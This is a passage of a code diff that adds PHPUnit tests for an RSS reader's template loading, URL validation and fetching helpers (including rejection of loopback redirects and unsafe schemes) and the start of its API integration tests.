+     */
+    private function removeDir(string $dir): void
+    {
+        if (!is_dir($dir)) {
+            return;
+        }
+        $files = array_diff(scandir($dir), ['.', '..']);
+        foreach ($files as $file) {
+            $path = $dir . '/' . $file;
+            is_dir($path) ? $this->removeDir($path) : unlink($path);
+        }
+        rmdir($dir);
+    }
+
+    private function createTemplator(): Templator
+    {
+        return new Templator();
+    }
+
+    public function testReadTemplateFromTemplatesLocalTakesPriority(): void
+    {
+        file_put_contents('templates.local/test.tpl', 'FROM_LOCAL');
+        file_put_contents('templates/test.tpl', 'FROM_DEFAULT');
+
+        $t = $this->createTemplator();
+        $result = $t->readTemplateFromFile('test.tpl');
+
+        $this->assertTrue($result);
+
+        $output = '';
+        $t->generateOutputToString($output);
+        $this->assertEquals('FROM_LOCAL', $output);
+    }
+
+    public function testReadTemplateFromTemplatesAsFallback(): void
+    {
+        file_put_contents('templates/test.tpl', 'FROM_DEFAULT');
+
+        $t = $this->createTemplator();
+        $result = $t->readTemplateFromFile('test.tpl');
+
+        $this->assertTrue($result);
+
+        $output = '';
+        $t->generateOutputToString($output);
+        $this->assertEquals('FROM_DEFAULT', $output);
+    }
+
+    public function testFullPathIsDelegatedUnchanged(): void
+    {
+        mkdir('templates/subdir', 0755, true);
+        file_put_contents('templates/subdir/test.tpl', 'FROM_SUBDIR');
+
+        $t = $this->createTemplator();
+        $result = $t->readTemplateFromFile('templates/subdir/test.tpl');
+
+        $this->assertTrue($result);
+
+        $output = '';
+        $t->generateOutputToString($output);
+        $this->assertEquals('FROM_SUBDIR', $output);
+    }
+
+    public function testNonExistentFileReturnsFalse(): void
+    {
+        // Suppress E_USER_ERROR from MiniTemplator::triggerError so we can
+        // assert the return value instead of having the test abort.
+        set_error_handler(function ($errno, $errstr) {
+            if ($errno === E_USER_ERROR) {
+                return true;
+            }
+            return false;
+        });
+
+        try {
+            $t = $this->createTemplator();
+            $result = $t->readTemplateFromFile('nonexistent.tpl');
+
+            $this->assertFalse($result);
+        } finally {
+            restore_error_handler();
+        }
+    }
+}

--- a/tests_functional/UrlHelperTest.php
+++ b/tests_functional/UrlHelperTest.php
@@ -1,0 +1,584 @@
+<?php
+
+use GuzzleHttp\Client;
+use GuzzleHttp\Handler\MockHandler;
+use GuzzleHttp\HandlerStack;
+use GuzzleHttp\Psr7\Response;
+use GuzzleHttp\Psr7\Request;
+use GuzzleHttp\RedirectMiddleware;
+use GuzzleHttp\Exception\RequestException;
+use PHPUnit\Framework\TestCase;
+
+final class UrlHelperTest extends TestCase {
+
+    // ------------------------------------------------------------------------
+    // build_url
+    // ------------------------------------------------------------------------
+
+    public function test_build_url_full(): void {
+        $this->assertEquals(
+            'https://example.com:8080/path?query=value#fragment',
+            UrlHelper::build_url([
+                'scheme' => 'https',
+                'host'   => 'example.com',
+                'port'   => 8080,
+                'path'   => '/path',
+                'query'  => 'query=value',
+                'fragment' => 'fragment',
+            ])
+        );
+    }
+
+    public function test_build_url_minimal(): void {
+        $this->assertEquals(
+            'http://example.com',
+            UrlHelper::build_url([
+                'scheme' => 'http',
+                'host'   => 'example.com',
+            ])
+        );
+    }
+
+    public function test_build_url_no_port(): void {
+        $this->assertEquals(
+            'http://example.com/path',
+            UrlHelper::build_url([
+                'scheme' => 'http',
+                'host'   => 'example.com',
+                'path'   => '/path',
+            ])
+        );
+    }
+
+    public function test_build_url_query_no_fragment(): void {
+        $this->assertEquals(
+            'http://example.com?foo=bar',
+            UrlHelper::build_url([
+                'scheme' => 'http',
+                'host'   => 'example.com',
+                'query'  => 'foo=bar',
+            ])
+        );
+    }
+
+    public function test_build_url_fragment_no_query(): void {
+        $this->assertEquals(
+            'http://example.com#top',
+            UrlHelper::build_url([
+                'scheme'     => 'http',
+                'host'       => 'example.com',
+                'fragment'   => 'top',
+            ])
+        );
+    }
+
+    public function test_build_url_empty_path(): void {
+        $this->assertEquals(
+            'http://example.com',
+            UrlHelper::build_url([
+                'scheme' => 'http',
+                'host'   => 'example.com',
+            ])
+        );
+    }
+
+    // ------------------------------------------------------------------------
+    // validate
+    // ------------------------------------------------------------------------
+
+    public function test_validate_valid_http(): void {
+        $this->assertEquals('http://example.com', UrlHelper::validate('http://example.com'));
+    }
+
+    public function test_validate_valid_https(): void {
+        $this->assertEquals('https://example.com', UrlHelper::validate('https://example.com'));
+    }
+
+    public function test_validate_with_path_and_query(): void {
+        $result = UrlHelper::validate('https://example.com/path?foo=bar');
+        $this->assertMatchesRegularExpression('#^https://example\.com/path\?foo=bar$#', $result);
+    }
+
+    public function test_validate_protocol_relative_normalized(): void {
+        $this->assertEquals('https://example.com', UrlHelper::validate('//example.com'));
+    }
+
+    public function test_validate_rejects_ftp(): void {
+        $this->assertFalse(UrlHelper::validate('ftp://ftp.example.com'));
+    }
+
+    public function test_validate_rejects_mailto(): void {
+        $this->assertFalse(UrlHelper::validate('mailto:test@example.com'));
+    }
+
+    public function test_validate_rejects_javascript(): void {
+        $this->assertFalse(UrlHelper::validate('javascript:void(0)'));
+    }
+
+    public function test_validate_rejects_empty(): void {
+        $this->assertFalse(UrlHelper::validate(''));
+    }
+
+    public function test_validate_rejects_no_host(): void {
+        $this->assertFalse(UrlHelper::validate('about:blank'));
+    }
+
+    public function test_validate_rejects_malformed(): void {
+        $this->assertFalse(UrlHelper::validate('not a url'));
+    }
+
+    public function test_validate_extended_rejects_nonstandard_port(): void {
+        $this->assertFalse(UrlHelper::validate('http://example.com:8080/path', true));
+    }
+
+    public function test_validate_extended_rejects_localhost(): void {
+        $this->assertFalse(UrlHelper::validate('http://localhost', true));
+    }
+
+    public function test_validate_extended_rejects_localhost_with_path(): void {
+        $this->assertFalse(UrlHelper::validate('http://localhost/admin', true));
+    }
+
+    public function test_validate_extended_rejects_127_loopback(): void {
+        $this->assertFalse(UrlHelper::validate('http://127.0.0.2', true));
+    }
+
+    public function test_validate_extended_rejects_127_loopback_specific(): void {
+        $this->assertFalse(UrlHelper::validate('http://127.0.0.1:3000', true));
+    }
+
+    public function test_validate_extended_allows_standard_ports(): void {
+        $this->assertEquals('http://example.com:80', UrlHelper::validate('http://example.com:80', true));
+        $this->assertEquals('https://example.com:443', UrlHelper::validate('https://example.com:443', true));
+    }
+
+    public function test_validate_extended_nonextended_allows_nonstandard_port(): void {
+        // Without extended filtering, non-standard ports should pass
+        $this->assertMatchesRegularExpression('#^http://example\.com:8080$#', UrlHelper::validate('http://example.com:8080'));
+    }
+
+    public function test_validate_lowercase_scheme(): void {
+        // validate() allows uppercase schemes but preserves original case in output
+        $result = UrlHelper::validate('HTTP://EXAMPLE.COM');
+        $this->assertNotFalse($result);
+        $this->assertStringContainsString('HTTP', $result);
+    }
+
+    public function test_validate_idn_to_ascii(): void {
+        if (!function_exists('idn_to_ascii')) {
+            $this->markTestSkipped('idn_to_ascii not available');
+        }
+        $result = UrlHelper::validate('http://münchen.example.com');
+        $this->assertNotFalse($result);
+        // The host should be converted to punycode
+        $this->assertStringContainsString('xn--mnchen', $result);
+    }
+
+    public function test_validate_urlencoded_path(): void {
+        // Spaces in path are accepted (rawurlencode is only for filter_var validation)
+        $result = UrlHelper::validate('https://example.com/hello world');
+        $this->assertNotFalse($result);
+        // The returned URL preserves the original path (spaces not encoded)
+        $this->assertStringContainsString('hello world', $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // resolve_redirects
+    // ------------------------------------------------------------------------
+
+    public function test_resolve_redirects_no_redirect(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        // No redirect history header means no redirect occurred
+        $mock->append(new Response(200, [], ''));
+        $result = UrlHelper::resolve_redirects('https://example.com', 5);
+        $this->assertEquals('https://example.com', $result);
+        $mock->reset();
+    }
+
+    public function test_resolve_redirects_single_redirect(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $history = ['https://example.com/original', 'https://example.com/final'];
+        $mock->append(new Response(200, [
+            RedirectMiddleware::HISTORY_HEADER => $history,
+        ], ''));
+        $result = UrlHelper::resolve_redirects('https://example.com/original', 5);
+        $this->assertEquals('https://example.com/final', $result);
+        $mock->reset();
+    }
+
+    public function test_resolve_redirects_multiple_redirects(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $history = [
+            'https://example.com/a',
+            'https://example.com/b',
+            'https://example.com/c',
+        ];
+        $mock->append(new Response(200, [
+            RedirectMiddleware::HISTORY_HEADER => $history,
+        ], ''));
+        $result = UrlHelper::resolve_redirects('https://example.com/a', 5);
+        $this->assertEquals('https://example.com/c', $result);
+        $mock->reset();
+    }
+
+    public function test_resolve_redirects_exception_returns_false(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new \GuzzleHttp\Exception\ConnectException('Connection refused', new Request('HEAD', 'https://example.com')));
+        $result = UrlHelper::resolve_redirects('https://example.com', 5);
+        $this->assertFalse($result);
+        $mock->reset();
+    }
+
+    // ------------------------------------------------------------------------
+    // url_to_youtube_vid
+    // ------------------------------------------------------------------------
+
+    public function test_url_to_youtube_vid_watch(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://www.youtube.com/watch?v=dQw4w9WgXcQ'));
+    }
+
+    public function test_url_to_youtube_vid_watch_with_extra_params(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://www.youtube.com/watch?v=dQw4w9WgXcQ&t=10'));
+    }
+
+    public function test_url_to_youtube_vid_short(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://youtu.be/dQw4w9WgXcQ'));
+    }
+
+    public function test_url_to_youtube_vid_embed(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://www.youtube.com/embed/dQw4w9WgXcQ'));
+    }
+
+    public function test_url_to_youtube_vid_v(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://www.youtube.com/v/dQw4w9WgXcQ'));
+    }
+
+    public function test_url_to_youtube_vid_nocookie(): void {
+        $this->assertEquals('dQw4w9WgXcQ', UrlHelper::url_to_youtube_vid('https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ'));
+    }
+
+    public function test_url_to_youtube_vid_invalid(): void {
+        $this->assertFalse(UrlHelper::url_to_youtube_vid('https://www.youtube.com/'));
+        $this->assertFalse(UrlHelper::url_to_youtube_vid('https://vimeo.com/12345'));
+        $this->assertFalse(UrlHelper::url_to_youtube_vid('not-a-url'));
+        $this->assertFalse(UrlHelper::url_to_youtube_vid(''));
+    }
+
+    // ------------------------------------------------------------------------
+    // rewrite_relative (additional cases)
+    // ------------------------------------------------------------------------
+
+    public function test_rewrite_relative_data_image_for_img(): void {
+        $this->assertEquals(
+            'data:image/png;base64,iVBORw0KGgo',
+            UrlHelper::rewrite_relative(
+                'http://example.com/',
+                'data:image/png;base64,iVBORw0KGgo',
+                'img',
+                'src'
+            )
+        );
+    }
+
+    public function test_rewrite_relative_data_image_rejected_for_other_element(): void {
+        // data: scheme should be rewritten (not allowed) for non-img elements
+        $result = UrlHelper::rewrite_relative('http://example.com/', 'data:image/png;base64,x', 'a', 'href');
+        $this->assertNotEquals('data:image/png;base64,x', $result);
+        $this->assertNotFalse($result);
+    }
+
+    public function test_rewrite_relative_data_video_not_allowed(): void {
+        // Only image/* base64 is allowed for img[src]
+        $result = UrlHelper::rewrite_relative('http://example.com/', 'data:video/mp4;base64,x', 'img', 'src');
+        $this->assertNotEquals('data:video/mp4;base64,x', $result);
+    }
+
+    public function test_rewrite_relative_content_type_magnet(): void {
+        $this->assertEquals(
+            'magnet:?xt=urn:btih:...',
+            UrlHelper::rewrite_relative(
+                'http://example.com/',
+                'magnet:?xt=urn:btih:...',
+                '',
+                '',
+                'application/x-bittorrent'
+            )
+        );
+    }
+
+    public function test_rewrite_relative_absolute_relative_path(): void {
+        // Absolute relative path (/test.html) should NOT prepend base dirname
+        $this->assertEquals(
+            'https://example.com/test.html',
+            UrlHelper::rewrite_relative('https://example.com/foo/bar/', '/test.html')
+        );
+    }
+
+    public function test_rewrite_relative_base_no_path(): void {
+        // Base URL with no path component
+        $result = UrlHelper::rewrite_relative('http://example.com', 'page.html');
+        $this->assertEquals('http://example.com/page.html', $result);
+    }
+
+    public function test_rewrite_relative_dotslash_with_base_dirname(): void {
+        // dirname("foo/bar/baz/") = "foo/bar", then append "test.html"
+        $this->assertEquals(
+            'https://example.com/foo/bar/test.html',
+            UrlHelper::rewrite_relative('https://example.com/foo/bar/baz/', './test.html')
+        );
+    }
+
+    public function test_rewrite_relative_absolute_url_passes_through(): void {
+        // An already-absolute URL should be validated and returned as-is
+        $this->assertEquals(
+            'https://other.com/page',
+            UrlHelper::rewrite_relative('http://example.com/', 'https://other.com/page')
+        );
+    }
+
+    public function test_rewrite_relative_empty_rel_url_returns_base(): void {
+        $this->assertEquals('http://example.com/base', UrlHelper::rewrite_relative('http://example.com/base', ''));
+    }
+
+    public function test_rewrite_relative_mailto_disallowed_without_context(): void {
+        // Without owner_element="a" and owner_attribute="href", mailto is treated as relative
+        $result = UrlHelper::rewrite_relative('http://example.com/', 'mailto:test@example.com');
+        $this->assertNotEquals('mailto:test@example.com', $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // fetch (additional edge cases)
+    // ------------------------------------------------------------------------
+
+    public function test_fetch_followlocation_false_with_200(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        // When followlocation=false and response is 200, should succeed
+        $mock->append(new Response(200, [], 'OK body'));
+        $result = UrlHelper::fetch(['url' => 'https://www.example.com', 'followlocation' => false]);
+        $this->assertEquals('OK body', $result);
+        $this->assertEquals(200, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+
+    public function test_fetch_empty_body(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(200, [], ''));
+        $result = UrlHelper::fetch(['url' => 'https://www.example.com']);
+        $this->assertFalse($result);
+        $this->assertEquals('Successful response, but no content was received.', UrlHelper::$fetch_last_error);
+        $mock->reset();
+    }
+
+    public function test_fetch_403_auth_retry_any(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(
+            new Response(403, []),
+            new Response(200, [], 'Retried OK'),
+        );
+        $result = UrlHelper::fetch([
+            'url'       => 'https://example.com/protected',
+            'login'     => 'user',
+            'pass'      => 'pass',
+            'auth_type' => 'basic',
+        ]);
+        $this->assertEquals('Retried OK', $result);
+        $this->assertEquals(200, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+
+    public function test_fetch_403_no_auth_does_not_retry(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(403, []));
+        $result = UrlHelper::fetch(['url' => 'https://example.com/protected']);
+        $this->assertFalse($result);
+        $this->assertEquals(403, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+
+    public function test_fetch_redirect_to_loopback_rejected(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(301, ['Location' => 'http://127.0.0.1']));
+        $result = UrlHelper::fetch(['url' => 'https://example.com', 'followlocation' => true]);
+        $this->assertFalse($result);
+        $this->assertMatchesRegularExpression('%failed extended validation%', UrlHelper::$fetch_last_error);
+        $this->assertEquals('http://127.0.0.1', UrlHelper::$fetch_effective_url);
+        $mock->reset();
+    }
+
+    public function test_fetch_validates_effective_url_after_redirect(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $history = ['https://example.com/start', 'https://example.com/final'];
+        $mock->append(new Response(200, [
+            RedirectMiddleware::HISTORY_HEADER => $history,
+        ], 'body'));
+        $result = UrlHelper::fetch(['url' => 'https://example.com/start']);
+        $this->assertEquals('body', $result);
+        $this->assertEquals('https://example.com/final', UrlHelper::$fetch_effective_url);
+        $mock->reset();
+    }
+
+    public function test_fetch_sets_content_type(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(200, ['Content-Type' => 'text/html; charset=utf-8'], 'OK'));
+        UrlHelper::fetch(['url' => 'https://www.example.com']);
+        $this->assertEquals('text/html; charset=utf-8', UrlHelper::$fetch_last_content_type);
+        $mock->reset();
+    }
+
+    public function test_fetch_sets_last_modified(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(200, ['Last-Modified' => 'Wed, 01 Jan 2025 00:00:00 GMT'], 'OK'));
+        UrlHelper::fetch(['url' => 'https://www.example.com']);
+        $this->assertEquals('Wed, 01 Jan 2025 00:00:00 GMT', UrlHelper::$fetch_last_modified);
+        $mock->reset();
+    }
+
+    public function test_fetch_max_size_exceeded_by_content_length_header(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        // Server says Content-Length exceeds our max even before downloading.
+        // The on_headers callback throws LengthException, which Guzzle wraps;
+        // the catch block for GuzzleException sets the error message.
+        $mock->append(new Response(200, ['Content-Length' => '999999999'], 'body'));
+        $result = UrlHelper::fetch(['url' => 'https://www.example.com', 'max_size' => 100]);
+        $this->assertFalse($result);
+        // Guzzle wraps the LengthException from on_headers
+        $this->assertStringContainsString('on_headers', UrlHelper::$fetch_last_error);
+        $mock->reset();
+    }
+
+    public function test_fetch_trims_leading_spaces(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(200, [], 'OK'));
+        $result = UrlHelper::fetch(['url' => '  https://www.example.com']);
+        $this->assertEquals('OK', $result);
+        $mock->reset();
+    }
+
+    public function test_fetch_spaces_in_url_encoded(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(200, [], 'OK'));
+        // Spaces in URL should be percent-encoded before validation
+        $result = UrlHelper::fetch(['url' => 'https://www.example.com/hello world']);
+        $this->assertEquals('OK', $result);
+        $mock->reset();
+    }
+
+    public function test_fetch_invalid_url_after_redirect(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        // Redirect to an invalid scheme (ftp) — Guzzle rejects this before our on_redirect callback
+        $mock->append(new Response(301, ['Location' => 'ftp://ftp.example.com']));
+        $result = UrlHelper::fetch(['url' => 'https://example.com']);
+        $this->assertFalse($result);
+        // Either our validation or Guzzle's protocol check catches this
+        $this->assertStringContainsString('ftp', UrlHelper::$fetch_last_error);
+        $mock->reset();
+    }
+
+    public function test_fetch_error_code_on_4xx(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(404, [], 'Not Found'));
+        $result = UrlHelper::fetch(['url' => 'https://example.com/nonexistent']);
+        $this->assertFalse($result);
+        $this->assertEquals(404, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+
+    public function test_fetch_error_code_on_5xx(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        $mock->append(new Response(500, [], 'Internal Server Error'));
+        $result = UrlHelper::fetch(['url' => 'https://example.com/error']);
+        $this->assertFalse($result);
+        $this->assertEquals(500, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+
+    public function test_fetch_resets_state_on_call(): void {
+        $mock = new MockHandler();
+        UrlHelper::$client = new Client([
+            'handler' => HandlerStack::create($mock),
+        ]);
+
+        // First call sets error state
+        $mock->append(new Response(404, [], 'Not Found'));
+        UrlHelper::fetch(['url' => 'https://example.com/first']);
+        $this->assertEquals(404, UrlHelper::$fetch_last_error_code);
+
+        // Second call should reset state
+        $mock->append(new Response(200, [], 'OK'));
+        UrlHelper::fetch(['url' => 'https://www.example.com']);
+        $this->assertEquals(200, UrlHelper::$fetch_last_error_code);
+        $mock->reset();
+    }
+}

--- a/tests_functional/bootstrap.php
+++ b/tests_functional/bootstrap.php
@@ -1,0 +1,8 @@
+<?php
+    set_include_path(dirname(__DIR__) ."/include" . PATH_SEPARATOR .
+    get_include_path());
+
+    putenv("IS_TESTING=true");
+	putenv("TTRSS_LOG_DESTINATION=stdout");
+
+    require_once "autoload.php";

--- a/tests_integration/ApiTest.php
+++ b/tests_integration/ApiTest.php
@@ -1,0 +1,480 @@
+<?php
+/** @group integration */
+final class ApiTest extends IntegrationTestCase {
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Ensure ALL articles are considered "fresh" regardless of when tests run.
+        // Default FRESH_ARTICLE_MAX_AGE is 24 hours; seed data articles may be old.
+        Prefs::set(Prefs::FRESH_ARTICLE_MAX_AGE, 999999, 1, null);
+    }
+
+    public function test_getVersion() : void {
+        $resp = $this->api(["op" => "getVersion"]);
+
+        $this->common_assertions($resp);
+        $this->assertArrayHasKey("version", $resp['content']);
+    }
+
+    public function test_getUnread() : void {
+        $resp = $this->api(["op" => "getUnread"]);
+        $this->common_assertions($resp);
+
+        $this->assertArrayHasKey("unread", $resp['content']);
+    }
+
+    public function test_subscribeToFeed() : void {
+
+        $feed_url = $this->app_url . "/tests_integration/feed.xml";
+
+        $resp = $this->api(["op" => "subscribeToFeed", "feed_url" => $feed_url]);
+        $this->common_assertions($resp);
+
+        $this->assertArrayHasKey("feed_id", $resp['content']['status']);
+    }
+
+    public function test_getCounters() : void {
+        $resp = $this->api(["op" => "getCounters"]);
+        $this->common_assertions($resp);
+
+        foreach ($resp['content'] as $ctr) {
+            $this->assertIsArray($ctr);
+
+            foreach (["id", "counter"] as $k) {
+                $this->assertArrayHasKey($k, $ctr);
+                $this->assertNotNull($ctr[$k]);
+            }
+        }
+    }
+
+    public function test_getFeedTree() : void {
+        $resp = $this->api(["op" => "getFeedTree"]);
+
+        $this->assertArrayHasKey('categories', $resp['content']);
+        $this->assertArrayHasKey('items', $resp['content']['categories']);
+
+        foreach ($resp['content']['categories']['items'] as $cat) {
+
+            foreach (["id", "bare_id", "name", "items"] as $k) {
+                $this->assertArrayHasKey($k, $cat);
+            }
+
+            foreach ($cat['items'] as $feed) {
+                $this->assertIsArray($feed);
+
+                foreach (["id", "name", "unread", "bare_id"] as $k) {
+                    $this->assertArrayHasKey($k, $feed);
+                    $this->assertNotNull($feed[$k]);
+                }
+            }
+        }
+    }
+
+    public function test_getHeadlines() : void {
+        // ── Basic structure ──
+
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-4"]); // FEED_ALL
+        $this->common_assertions($resp);
+
+        // Without include_header, content is a numerically indexed array of headlines
+        $this->assertIsArray($resp['content']);
+        $this->assertIsInt($resp['content'][0]['id']);
+
+        // ── Virtual feeds ──
+
+        // FEED_ALL ("-4") — all 11 articles
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-4"]);
+        $this->assertEquals(11, count($resp['content']));
+
+        // FEED_STARRED ("-1") — 3 marked articles
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-1"]);
+        $this->assertEquals(3, count($resp['content']));
+        foreach ($resp['content'] as $hl) {
+            $this->assertTrue($hl['marked'], "Starred headline should be marked");
+        }
+
+        // FEED_FRESH ("-3") — unread recent articles
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-3"]);
+        $this->assertGreaterThan(0, count($resp['content']));
+        foreach ($resp['content'] as $hl) {
+            $this->assertTrue($hl['unread'], "Fresh headline should be unread");
+        }
+
+        // FEED_RECENTLY_READ ("-6") — always empty in this API path
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-6"]);
+        $this->assertIsArray($resp['content']);
+
+        // FEED_PUBLISHED ("-2") — 0 published articles in seed data
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "-2"]);
+        $this->assertEquals(0, count($resp['content']));
+
+        // ── Regular feed IDs ──
+
+        // Feed 1 (Hacker News) — 3 articles, 2 unread
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "1"]);
+        $this->assertEquals(3, count($resp['content']));
+        $feed_ids = array_column($resp['content'], 'feed_id');
+        $this->assertEquals(array_fill(0, 3, 1), $feed_ids);
+
+        // Feed 2 (The Register) — 3 articles, all unread
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "2"]);
+        $this->assertEquals(3, count($resp['content']));
+        foreach ($resp['content'] as $hl) {
+            $this->assertTrue($hl['unread']);
+        }
+
+        // Nonexistent feed
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "999"]);
+        $this->assertEquals(0, count($resp['content']));
+
+        // ── View modes ──
+
+        // Unread mode on FEED_ALL
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "view_mode" => "unread",
+        ]);
+        $this->assertEquals(8, count($resp['content']));
+        foreach ($resp['content'] as $hl) {
+            $this->assertTrue($hl['unread']);
+        }
+
+        // Marked mode on FEED_ALL
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "view_mode" => "marked",
+        ]);
+        $this->assertEquals(3, count($resp['content']));
+        foreach ($resp['content'] as $hl) {
+            $this->assertTrue($hl['marked']);
+        }
+
+        // ── Pagination ──
+
+        // Default limit is 200, but we test explicit limit
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "limit" => 5,
+        ]);
+        $this->assertEquals(5, count($resp['content']));
+
+        // Offset (skip)
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "limit" => 5,
+            "skip" => 5,
+        ]);
+        $this->assertEquals(5, count($resp['content']));
+
+        // ── Article structure ──
+
+        $resp = $this->api(["op" => "getHeadlines", "feed_id" => "1"]);
+        $hl = $resp['content'][0];
+
+        $this->assertArrayHasKey("id", $hl);
+        $this->assertArrayHasKey("guid", $hl);
+        $this->assertArrayHasKey("unread", $hl);
+        $this->assertArrayHasKey("marked", $hl);
+        $this->assertArrayHasKey("published", $hl);
+        $this->assertArrayHasKey("updated", $hl);
+        $this->assertArrayHasKey("title", $hl);
+        $this->assertArrayHasKey("link", $hl);
+        $this->assertArrayHasKey("feed_id", $hl);
+        $this->assertArrayHasKey("tags", $hl);
+        $this->assertArrayHasKey("labels", $hl);
+        $this->assertArrayHasKey("feed_title", $hl);
+        $this->assertArrayHasKey("comments_count", $hl);
+        $this->assertArrayHasKey("score", $hl);
+        $this->assertArrayHasKey("author", $hl);
+        $this->assertArrayHasKey("note", $hl);
+        $this->assertArrayHasKey("lang", $hl);
+        $this->assertArrayHasKey("site_url", $hl);
+
+        $this->assertIsInt($hl['id']);
+        $this->assertIsString($hl['guid']);
+        $this->assertIsBool($hl['unread']);
+        $this->assertIsBool($hl['marked']);
+        $this->assertIsInt($hl['updated']);
+        $this->assertIsString($hl['title']);
+        $this->assertIsInt($hl['feed_id']);
+        $this->assertIsArray($hl['tags']);
+        $this->assertIsArray($hl['labels']);
+        $this->assertIsInt($hl['comments_count']);
+        $this->assertIsInt($hl['score']);
+
+        // ── With excerpt and content ──
+
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "1",
+            "show_excerpt" => true,
+            "show_content" => true,
+        ]);
+        $hl = $resp['content'][0];
+
+        $this->assertArrayHasKey("excerpt", $hl);
+        $this->assertIsString($hl['excerpt']);
+        $this->assertNotEmpty($hl['excerpt']);
+
+        $this->assertArrayHasKey("content", $hl);
+        $this->assertIsString($hl['content']);
+
+        // ── Header ──
+        // With include_header=true, content is [headlines_header, headlines]
+
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "include_header" => true,
+        ]);
+        $this->assertIsArray($resp['content']);
+        $this->assertCount(2, $resp['content']);
+        $header = $resp['content'][0];
+        $headlines = $resp['content'][1];
+
+        $this->assertArrayHasKey("id", $header);
+        $this->assertArrayHasKey("first_id", $header);
+        $this->assertArrayHasKey("is_cat", $header);
+        $this->assertEquals("-4", $header['id']);
+        $this->assertFalse($header['is_cat']);
+        $this->assertIsArray($headlines);
+        $this->assertGreaterThan(0, count($headlines));
+
+        // ── Category view ──
+
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "1",
+            "is_cat" => true,
+            "include_header" => true,
+        ]);
+        $this->assertGreaterThan(0, count($resp['content'][1]));
+        $this->assertTrue($resp['content'][0]['is_cat']);
+
+        // ── Since ID ──
+
+        $resp = $this->api([
+            "op" => "getHeadlines",
+            "feed_id" => "-4",
+            "since_id" => 5,
+        ]);
+        foreach ($resp['content'] as $hl) {
+            $this->assertGreaterThan(5, $hl['id']);
+        }
+    }
+
+    public function test_getArticle_markAsRead_verify() : void {
+        // Article 1 (uuid-hn-001) starts as unread (from seed.sql)
+        $article_id = 1;
+
+        // 1. Retrieve the article and verify initial state
+        $resp = $this->api(["op" => "getArticle", "article_id" => $article_id]);
+        $this->common_assertions($resp);
+
+        $articles = $resp['content'];
+        $this->assertIsArray($articles);
+        $this->assertNotEmpty($articles);
+
+        $article = $articles[0];
+        $this->assertEquals($article_id, $article['id']);
